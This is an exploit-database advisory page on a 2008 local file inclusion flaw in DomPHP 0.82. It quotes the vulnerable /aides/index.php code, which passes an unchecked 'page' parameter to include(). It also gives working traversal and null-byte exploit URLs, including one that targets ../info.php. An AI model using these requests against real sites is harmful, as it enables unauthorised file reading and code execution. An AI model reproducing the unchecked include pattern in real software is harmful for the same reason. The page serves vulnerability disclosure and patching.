header-logo
Suggest Exploit
vendor:
DomPHP
by:
HouSSaMix From H-T Team
7.5
CVSS
HIGH
Local File Inclusion
98
CWE
Product Name: DomPHP
Affected Version From: 0.82
Affected Version To: 0.82
Patch Exists: YES
Related CWE: N/A
CPE: a:domphp:domphp:0.82
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

DomPHP 0.82 Local File Inclusion

A local file inclusion vulnerability exists in DomPHP 0.82. An attacker can exploit this vulnerability to include arbitrary files from the local system. This can be exploited to gain access to sensitive information or execute arbitrary code on the vulnerable system. The vulnerable code is located in the /aides/index.php file. The code allows an attacker to include arbitrary files from the local system by sending a specially crafted HTTP request containing directory traversal characters. This can be exploited to include arbitrary files from the local system.

Mitigation:

Upgrade to the latest version of DomPHP 0.82 or apply the patch provided by the vendor.
Source

Exploit-DB raw data:

-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

= Author : HouSSaMix From H-T Team
                          
= Script : DomPHP 0.82              
= Download :  http://www.domphp.com/download/
             			        
= BUG : Local File Inclusion  
       
=  Vulnerable CODE :
~~~~~~~~~ /aides/index.php ~~~~~~~~~~~~~~~~~~~~~~
if (isset($_GET['page'])) {
	// On supprime le http:// si tentative de fraude.
	$page = str_replace("http://","",$_GET['page']);
	include("../aides/".$page.".html");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~	   

= Exploit :                                                  
http://Target/[path]/aides/index.php?page=[LFI]%00
      
= Get phpinfo =>  http://Target/[path]/info.php 
                http://Target/[path]/aides/index.php?page=../info.php%00
				
-------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo --------
-------------------------------------------------------------

# milw0rm.com [2008-02-09]

Navigation

Suggest Exploit

Services By CQR